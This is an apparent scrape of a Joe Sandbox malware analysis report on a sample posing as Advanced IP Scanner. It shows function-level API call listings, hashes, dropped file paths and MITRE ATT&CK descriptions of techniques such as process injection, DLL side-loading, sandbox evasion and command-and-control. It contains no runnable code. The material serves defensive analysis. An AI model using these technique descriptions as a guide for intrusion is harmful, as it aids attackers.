Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A

Function 1101D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D064

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D053
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380

Function 11157350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 11157358
GetPropA.USER32(?,OldMenu), ref: 11157368

Strings

OldMenu, xrefs: 11157362

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MenuProp
String ID: OldMenu
API String ID: 601939786-3235417843
Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA

Function 1100D790 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(111E8DEC,00000000,?,?,1100C15B,00000000,00000000), ref: 1100D79F
LeaveCriticalSection.KERNEL32(111E8DEC,?,?,1100C15B,00000000,00000000), ref: 1100D810

Part of subcall function 1100D700: EnterCriticalSection.KERNEL32(111E8DEC,?,?,1100B4CC,?), ref: 1100D709
Part of subcall function 1100D700: LeaveCriticalSection.KERNEL32(111E8DEC,?,1100B4CC,?), ref: 1100D781

LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7DF
LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D7FB

Part of subcall function 1100D6B0: EnterCriticalSection.KERNEL32(111E8DEC,1100C3EB), ref: 1100D6B5
Part of subcall function 1100D6B0: LeaveCriticalSection.KERNEL32(111E8DEC), ref: 1100D6EF

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: f66ecf3714c859a81cdc4bb94732644680549d43e4677b6ab0f5a47de0aac6d5
Instruction ID: 2708ec326fc7ce8a95e5e2d6ee606d17e2d645df98342fd5c938547174611261
Opcode Fuzzy Hash: f66ecf3714c859a81cdc4bb94732644680549d43e4677b6ab0f5a47de0aac6d5
Instruction Fuzzy Hash: 8401843AE121399BE701EFE59C4899DBBACEB096A5B0041A5FD0CD3240E631AD0087F2

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Advanced_IP_Scanner_2.5.4594.12.exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Remote Access Functionality

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

Windows Analysis Report
Advanced_IP_Scanner_2.5.4594.12.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.
Tactics:	Impact
Data Sources:	Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre